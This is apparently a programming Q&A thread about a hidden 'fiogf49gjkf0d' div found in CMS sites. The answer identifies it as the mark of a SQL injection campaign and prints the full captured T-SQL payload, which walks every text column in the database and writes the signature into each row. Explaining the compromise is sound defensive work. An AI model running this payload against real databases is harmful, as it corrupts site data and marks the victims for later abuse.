# Where is fiogf49gjkf0d content coming from?

Tags: html, sql-server, content-management-system

We noticed many websites have this content contained within their CMS:

<div style="display:none">fiogf49gjkf0d</div>

Does anyone know what it means or where it's coming from?

Comment: Not sure, but it seems to always be wrapped in a `<div style="display: none;">` and it seems to be innocuous in that it can't do anything by itself. However, it can be a way to locate compromised systems via a simple Google-search. Or, it can be some sort of tracking-value for either Google Analytics or Facebook (which seems to be prevalent on most of these sites).

Comment: It's evidence of SQL Injection.

Answer (score 3):

I did a little bit of research and I believe that this is the result of a SQL injection vulnerability. Here's the offending payload I found:

```
tho;
declare @c cursor;
set @c=cursor for select TABLE_NAME,c.COLUMN_NAME FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS c ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%text';
declare @a varchar(99);
declare @s varchar(99);
declare @f varchar(99);
declare @sql varchar(8000);
open @c;
fetch next from @c into @a,@s;
while @@FETCH_STATUS=0 begin set @sql='declare @f binary(16);
declare @x cursor;
set @x=cursor for SELECT TEXTPTR([' @s ']) FROM [' @a '] where not [' @s '] like ''%fiogf49gjkf0d%'';
open @x;
fetch next from @x into @f;
while @@FETCH_STATUS=0 begin declare @sql varchar(8000);
set @sql=''UPDATETEXT [' @a '].[' @s '] '' master.dbo.fn_varbintohexstr(@f) '' 0 0 '''''' char(60) ''div style="display:none"'' char(62) ''fiogf49gjkf0d'' char(60) char(47) ''div'' char(62) '''''''';
exec(@sql);
fetch next from @x into @f;
end;
close @x';
exec(@sql);
fetch next from @c into @a,@s;
end;
close @c--
```

My guess is that a bot executes this against sites using SQL Server. The payload will basically enumerate all tables/columns and if the column is of type `*text`, it'll insert the signature.

@junkfoodjunkie is probably right that the signature is used so whoever is running the bot can easily find sites they've compromised via Google or another search engine.